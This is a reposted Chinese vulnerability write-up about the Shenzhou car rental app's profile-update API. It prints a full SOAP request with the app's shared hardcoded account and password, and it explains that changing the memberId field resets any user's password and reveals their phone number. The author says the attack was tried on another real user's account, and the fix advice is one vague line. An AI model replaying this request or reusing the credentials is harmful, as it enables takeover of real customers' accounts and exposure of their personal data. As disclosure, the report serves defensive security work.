网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

神州租车任意用户密码修改 - 网站安全 - 自学p

来源:自学PHP网    时间:2015-04-15 14:59 作者: 阅读:

[导读] 问题出在神州租车的app端,校验机制设计的太脆弱~下面是修改用户个人资料的请求数据包,数据包中的验证部分account、password居然是公共的所有用户的验证都是同样的值,又没有其他的...

问题出在神州租车的app端,校验机制设计的太脆弱~
 
 
 
下面是修改用户个人资料的请求数据包,数据包中的验证部分account、password居然是公共的所有用户的验证都是同样的值,又没有其他的验证机制,那么这里肯定可以修改任意用户的值~
POST http://sdk.zuche.com/CARSDK/services/zuche1 HTTP/1.1

Host: sdk.zuche.com

Connection: close

Accept-Encoding: gzip

Content-Type: text/xml; charset=utf-8

Content-Length: 526

Connection: close

SOAPAction: http://sdk.zuche.com/CARSDK/services/zuche1?UpdateUser

User-Agent: 神州租车 2.6 (iPhone; iPhone OS 7.0.4; zh_CN)



<?xml version='1.0' encoding='utf-8'?>

<soap:Envelope xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' xmlns:xsd='http://www.w3.org/2001/XMLSchema' xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'>

<soap:Header>

<CheckSoap xmlns='http://tempuri.org/'>

<Account>szzciphone</Account>

<Password>szzc#iphone</Password>

</CheckSoap>

</soap:Header>

<soap:Body>

<UpdateUser xmlns='http://tempuri.org/'>

<User>{"memberId":"3xxxx3","password":"123qwe","emailaddress":"xxxxx@sina.cn"}</User>

</UpdateUser>

</soap:Body>

</soap:Envelope>

 

 
 
 
 
所以,我们通过修改memberId就能修改任意用户的信息,通过测试这里的emailaddress参数如果为空,将不会更改用户原来设置的值,修改不同id用户的密码后,系统会返回该用户的帐号信息(手机号码),那么有了手机号码,我们就能登陆任意用户的帐号,下面是我自己的帐号测试结果;
 
下面我们随意测试一个用户的帐号吧;
 
这个就是证明咯;
 


修复方案:
各种校验,没说的~

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论